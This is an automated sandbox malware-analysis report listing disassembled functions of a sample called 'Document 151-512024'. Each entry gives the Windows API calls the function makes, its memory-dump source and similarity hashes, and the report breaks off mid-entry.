Instruction Fuzzy Hash: 0511CEB2414305AFD718EF54DC86E6AB7BDEB44724B20852EE45697281EB70BC81CB60

Function 009AD5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009AD608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 009AD645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009AD650

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 0e14470d5c90ceb815c004824b2925cfbeb416eee0cd04b8e606394e53ebba90
Instruction ID: 32a26323c06d961702cd3c61fc5a6d3a85c15247732e630f87be6da8c17478f1
Opcode Fuzzy Hash: 0e14470d5c90ceb815c004824b2925cfbeb416eee0cd04b8e606394e53ebba90
Instruction Fuzzy Hash: 76118EB1E46228BFDB148F94DC44FAFBBBCEB45B50F108112F904E7290C2704A018BE1

Function 009A1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 009A168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009A16A1
FreeSid.ADVAPI32(?), ref: 009A16B1

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: c25582d2fa8ea9b7df2b7cd132eb42847a215672ef015dd55b423c9f6cd68f3e
Instruction ID: 40dd2d591c4623e10502dd55f78f5e92eafe8f24b94012af2a24e57f00fcf8b0
Opcode Fuzzy Hash: c25582d2fa8ea9b7df2b7cd132eb42847a215672ef015dd55b423c9f6cd68f3e
Instruction Fuzzy Hash: 89F0F4B19A5309FBDF00DFE4DC89AAEBBBCEB08644F504565E501E2181E774AA849A50

Function 00964CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(009728E9,?,00964CBE,009728E9,00A088B8,0000000C,00964E15,009728E9,00000002,00000000,?,009728E9), ref: 00964D09
TerminateProcess.KERNEL32(00000000,?,00964CBE,009728E9,00A088B8,0000000C,00964E15,009728E9,00000002,00000000,?,009728E9), ref: 00964D10
ExitProcess.KERNEL32 ref: 00964D22

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: d0b715ce677e4e18fc2ae9f2459aaddf3127ffc54273694a045f7b79203b5377
Instruction ID: 848cf9996c3ebf2874a3f25d1ccf7dde6f763a2f9d5755eb0707b6315b7b8319
Opcode Fuzzy Hash: d0b715ce677e4e18fc2ae9f2459aaddf3127ffc54273694a045f7b79203b5377
Instruction Fuzzy Hash: F6E0B671455149ABCF11AF94DE1AA587B6DEB81781F108015FC098B162CB35ED82EB80

Function 0097C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0097C36C

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: f54e5aad89dad155647477fb2b3239d031d82df317ae08451b6efd81ee42b7d2
Instruction ID: b75693996a18da39e218bbd08a5f251e4b3dd88b21468c1ff2a53b8595d6f971
Opcode Fuzzy Hash: f54e5aad89dad155647477fb2b3239d031d82df317ae08451b6efd81ee42b7d2
Instruction Fuzzy Hash: 714136B3900219ABCB209FB9CC89EAB77BCEBC4314F10826DF919D7181E6309D81CB50

Function 0099D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0099D28C

Strings

X64, xrefs: 0099D2A8

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 43d7276a6454edee741461f37de1dc4c3c4bec081c2e17df00db70ccfa5ad8f7
Instruction ID: 0015086f38446dd6a4083518860a1b14bb8e085d90a16bcedf432a10658d1516
Opcode Fuzzy Hash: 43d7276a6454edee741461f37de1dc4c3c4bec081c2e17df00db70ccfa5ad8f7
Instruction Fuzzy Hash: 8DD0C9B481611DEACF90CBA0DCC8DDDB37CBB04305F100552F506A2080D73495489F10

Function 0096CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: f16327a1e84d9c949998d02a5f33880f753af14d1b96c40bb3a3e8e7b6e8f4c6
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 40023DB1E001199BDF14CFA9C8806ADBBF5EF88314F25856AE859E7380D731AD41CB94

Function 009B68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 009B6918
FindClose.KERNEL32(00000000), ref: 009B6961

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: e41128f22e42a52003f121b4f8ef48f705cc1a47f9f036f745485c6e6c783aac
Instruction ID: d246cc1e62f5d463b718391ad7efce85aab709859dfe5e528df37612ef1370d0
Opcode Fuzzy Hash: e41128f22e42a52003f121b4f8ef48f705cc1a47f9f036f745485c6e6c783aac
Instruction Fuzzy Hash: B311D0716042019FC710CF29C484E16BBE4FF84328F04C699F8698F2A2C734EC45CB90

Function 009B37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,009C4891,?,?,00000035,?), ref: 009B37E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,009C4891,?,?,00000035,?), ref: 009B37F4

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: b7bbf7c4e737640002198aee2753396912dae740b0c9e5cfe6af4e762a5d9f6a
Instruction ID: 2560f01f4f024dc019640b0f5e57dedbd71dd81936544cfcb4857bd414d49c61
Opcode Fuzzy Hash: b7bbf7c4e737640002198aee2753396912dae740b0c9e5cfe6af4e762a5d9f6a
Instruction Fuzzy Hash: 1AF0ECB06052256AD71057655C8DFDB775DDFC4771F004165F509D2281D9609944C7B0

Function 009AB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 009AB25D
keybd_event.USER32(?,7707C0D0,?,00000000), ref: 009AB270

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 10e61776f3b5c5a5370a2d83694d1fe17fddf0427508c98d70cf8a5eacb2b813
Instruction ID: c0ddb77f153322ded8116524b2e90bdcce38d48e2e6adc2ed7ed2bfc1cf625c6
Opcode Fuzzy Hash: 10e61776f3b5c5a5370a2d83694d1fe17fddf0427508c98d70cf8a5eacb2b813
Instruction Fuzzy Hash: 4EF06D7185424EABDB058FA0C805BAE7BB4FF04305F00800AF961A5192C3798241DF94

Function 009A10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009A11FC), ref: 009A10D4
CloseHandle.KERNEL32(?,?,009A11FC), ref: 009A10E9

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: d4a5ca0f756a20ab376d4706a0cec2683e454beb8ace3f8cfc2df9b309548c73
Instruction ID: 3849afc579eac136f267f8189a6e3d89f1cf7fcca40a4175620a22234b6194df
Opcode Fuzzy Hash: d4a5ca0f756a20ab376d4706a0cec2683e454beb8ace3f8cfc2df9b309548c73
Instruction Fuzzy Hash: 9FE04F72058611AEE7252B51FC06F7377A9EB04321F10882EF8A5804B1DB626CD0EB50

Function 0094CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00990C40

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: e8cdc8a4d9c33eb49c51d8930abfe9346c06a4e7bab043daf5f2e6cb4cbe6e14
Instruction ID: be62bd7414a7cd808cd01445f244c5b2663119194fc39a30f48c137f13a2e24c
Opcode Fuzzy Hash: e8cdc8a4d9c33eb49c51d8930abfe9346c06a4e7bab043daf5f2e6cb4cbe6e14
Instruction Fuzzy Hash: 12328CB0901218DFCF54DF94C885FEDB7B9BF84304F148569E816AB292D739AE49CB60

Function 0097676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00976766,?,?,00000008,?,?,0097FEFE,00000000), ref: 00976998

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: fd46734b3c0728d971371acb840e95f69565ed916dae8a0abb930e6511a072c0
Instruction ID: 4129b53cbaf8dc380d0fa05cac0129a1d5956acbf9ec8c11e0356984f3859aac
Opcode Fuzzy Hash: fd46734b3c0728d971371acb840e95f69565ed916dae8a0abb930e6511a072c0
Instruction Fuzzy Hash: 46B13B32610A099FD719CF28C48ABA57BE0FF45364F25C658E99DCF2A2C335E995CB40

Function 0095B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0099851F

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 3bb45a4303f96d697611eb1a054e651ecb0c1343c45dd7ee8726b1f9f51a019a
Instruction ID: c25b0c869a34fc7ec4272fb5829942442bb4e3054a4df7cd99363a7771ba8503
Opcode Fuzzy Hash: 3bb45a4303f96d697611eb1a054e651ecb0c1343c45dd7ee8726b1f9f51a019a
Instruction Fuzzy Hash: 8A124E719002299FCF24CF59C881BEEB7B9FF49710F14819AE849EB255DB349E85CB90

Function 009BEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 009BEABD

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: d30140d98065b4526bbcedb4b36d2fed02d706f1ec41ac161547b99ac5037ad0
Instruction ID: 011efa68eec7378c099676226c5a4903fa7ea8ee04e5f7dee7c4c2bbe08c595b
Opcode Fuzzy Hash: d30140d98065b4526bbcedb4b36d2fed02d706f1ec41ac161547b99ac5037ad0
Instruction Fuzzy Hash: 06E01A752102059FC710EF69D904E9AF7EDAF98770F008416FC49C7291DA74E8408B90

Function 009609D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,009603EE), ref: 009609DA

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ae7166639fe2dfbe0ad2f75f72cd14754501731f4efd6e79de71f574c6491886
Instruction ID: 3e3b1a0021fdac4e0455f52ca58dedb0be26ce1fb0db9b26d9b3ff69ded9527c
Opcode Fuzzy Hash: ae7166639fe2dfbe0ad2f75f72cd14754501731f4efd6e79de71f574c6491886
Instruction Fuzzy Hash:

Function 0096781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0096798B

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: b7dc45643cb03b69436eec85868b596e9b5cc32042b3a229f241cae93a179c80
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 0351687160C7056BDB3885F889DDBBFE3DD9B4234CF180A09D882D7282C619EE41D356

Function 00976DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e74e723e1b10b4f737bc5b4f3e1880cdb495164f1a979ced087af26ca3c759e8
Instruction ID: eed25075793bfaac9838bbc2cabcaf4cd2b6cffabd9800341fbd56a5462f0fd7
Opcode Fuzzy Hash: e74e723e1b10b4f737bc5b4f3e1880cdb495164f1a979ced087af26ca3c759e8
Instruction Fuzzy Hash: F9321122D2DF414DD7239634CC62336A64DAFB73C5F15D727F82AB99A6EB29C8835100

Function 0095CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0cc56e72277920cb601bba5d8274ca54cbd483003ec42f6c2e90c73ae2a9056
Instruction ID: 1a4f4d9369a0bd15c64e71c9b08a52c61322a6f004006e1b8f775d0440ce6ced
Opcode Fuzzy Hash: d0cc56e72277920cb601bba5d8274ca54cbd483003ec42f6c2e90c73ae2a9056
Instruction Fuzzy Hash: BA3249F2A002458FDF24CF6DC89067D7BA9EB45302F28896AD89ADB291D334DD85DB50

Function 00947920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f7419a09cb9671f4702a58916c337b73006dbee6964e578bddadca5135f8a41
Instruction ID: 0b67c2797b1e3f6b2509bba415352f69094eaba8a884299d5c64a906480081ad
Opcode Fuzzy Hash: 5f7419a09cb9671f4702a58916c337b73006dbee6964e578bddadca5135f8a41
Instruction Fuzzy Hash: 71229FB0A0460ADFDF14DFA5C881AAEB7B5FF44300F144529E816E7391EB3A9D19CB50

Function 009491C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a30b4fa3a9b79be2dceaec85ff71b88c63d5e726828cbf101b7ff275f8468dd2
Instruction ID: 9cf052970cd93bd9594e785df11eb381aa1ac63f5bb4a40aec5da7ccb267dac4
Opcode Fuzzy Hash: a30b4fa3a9b79be2dceaec85ff71b88c63d5e726828cbf101b7ff275f8468dd2
Instruction Fuzzy Hash: 1502C5B1E0010AEBDF04EF54D891BAEB7B5FF44300F108569E8169B391EB35AE25CB81

Function 00961C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
